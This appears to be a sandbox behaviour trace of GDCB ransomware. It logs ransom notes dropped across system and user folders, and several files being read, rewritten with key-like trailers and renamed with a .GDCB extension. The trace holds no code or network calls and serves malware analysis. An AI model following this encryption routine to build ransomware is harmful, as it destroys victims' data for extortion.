File Create filename = C:\Boot\sk-SK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\sk-SK\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\sl-SI\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\sl-SI\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\sr-Latn-CS\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\sr-Latn-CS\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\sr-Latn-RS\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\sr-Latn-RS\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\sv-SE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\sv-SE\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\tr-TR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\tr-TR\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\uk-UA\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\uk-UA\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\zh-CN\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\zh-CN\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\zh-HK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\zh-HK\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\zh-TW\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\zh-TW\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\PerfLogs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Recovery\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Recovery\WindowsRE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\WindowsRE\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Recovery\WindowsRE\ReAgent.xml, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Recovery\WindowsRE\ReAgent.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\WindowsRE\ReAgent.xml, size = 1048576, size_out = 1041 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\ReAgent.xml, size = 1056 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\ReAgent.xml, size = 256 True 2
Fn
Data
File Write filename = C:\Recovery\WindowsRE\ReAgent.xml, size = 16 True 1
Fn
Data
File Move source_filename = C:\Recovery\WindowsRE\ReAgent.xml, destination_filename = C:\Recovery\WindowsRE\ReAgent.xml.GDCB True 1
Fn
File Create filename = C:\System Volume Information\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\004-sn-0z5C.wav, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\004-sn-0z5C.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\004-sn-0z5C.wav, size = 1048576, size_out = 56030 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\004-sn-0z5C.wav, size = 56032 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\004-sn-0z5C.wav, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\004-sn-0z5C.wav, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\004-sn-0z5C.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\004-sn-0z5C.wav.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1WmQLmoja01-EP.gif, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1WmQLmoja01-EP.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1WmQLmoja01-EP.gif, size = 1048576, size_out = 4074 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1WmQLmoja01-EP.gif, size = 4080 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1WmQLmoja01-EP.gif, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1WmQLmoja01-EP.gif, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1WmQLmoja01-EP.gif, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1WmQLmoja01-EP.gif.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4SCtkxF.ots, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4SCtkxF.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4SCtkxF.ots, size = 1048576, size_out = 5883 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4SCtkxF.ots, size = 5888 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4SCtkxF.ots, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4SCtkxF.ots, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4SCtkxF.ots, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4SCtkxF.ots.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6ttfnwVzD3wR1.wav, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6ttfnwVzD3wR1.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6ttfnwVzD3wR1.wav, size = 1048576, size_out = 97467 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6ttfnwVzD3wR1.wav, size = 97472 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6ttfnwVzD3wR1.wav, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6ttfnwVzD3wR1.wav, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6ttfnwVzD3wR1.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6ttfnwVzD3wR1.wav.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8MU6pxFxklXwXFC.m4a, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8MU6pxFxklXwXFC.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8MU6pxFxklXwXFC.m4a, size = 1048576, size_out = 29201 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8MU6pxFxklXwXFC.m4a, size = 29216 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8MU6pxFxklXwXFC.m4a, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8MU6pxFxklXwXFC.m4a, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8MU6pxFxklXwXFC.m4a, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8MU6pxFxklXwXFC.m4a.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Collab\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Collab\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Forms\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Forms\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\NAHQNPMN\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\NAHQNPMN\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Headlights\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Headlights\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Linguistics\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Linguistics\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_00209595-b6ba-4fa7-88b0-97083d4c2159_0.log, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_00209595-b6ba-4fa7-88b0-97083d4c2159_0.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_00209595-b6ba-4fa7-88b0-97083d4c2159_0.log, size = 1048576, size_out = 1400 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_00209595-b6ba-4fa7-88b0-97083d4c2159_0.log, size = 1408 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_00209595-b6ba-4fa7-88b0-97083d4c2159_0.log, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_00209595-b6ba-4fa7-88b0-97083d4c2159_0.log, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_00209595-b6ba-4fa7-88b0-97083d4c2159_0.log, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_00209595-b6ba-4fa7-88b0-97083d4c2159_0.log.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_56653bcd-022e-4023-b1f6-9926fada0024_0.log, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_56653bcd-022e-4023-b1f6-9926fada0024_0.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_56653bcd-022e-4023-b1f6-9926fada0024_0.log, size = 1048576, size_out = 1205 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_56653bcd-022e-4023-b1f6-9926fada0024_0.log, size = 1216 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_56653bcd-022e-4023-b1f6-9926fada0024_0.log, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_56653bcd-022e-4023-b1f6-9926fada0024_0.log, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_56653bcd-022e-4023-b1f6-9926fada0024_0.log, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_c8be971a-de95-4557-abcb-db98e0788e08_56653bcd-022e-4023-b1f6-9926fada0024_0.log.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, size = 1048576, size_out = 216 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, size = 224 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, size = 1048576, size_out = 18761 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, size = 18768 True 1
Fn
Data
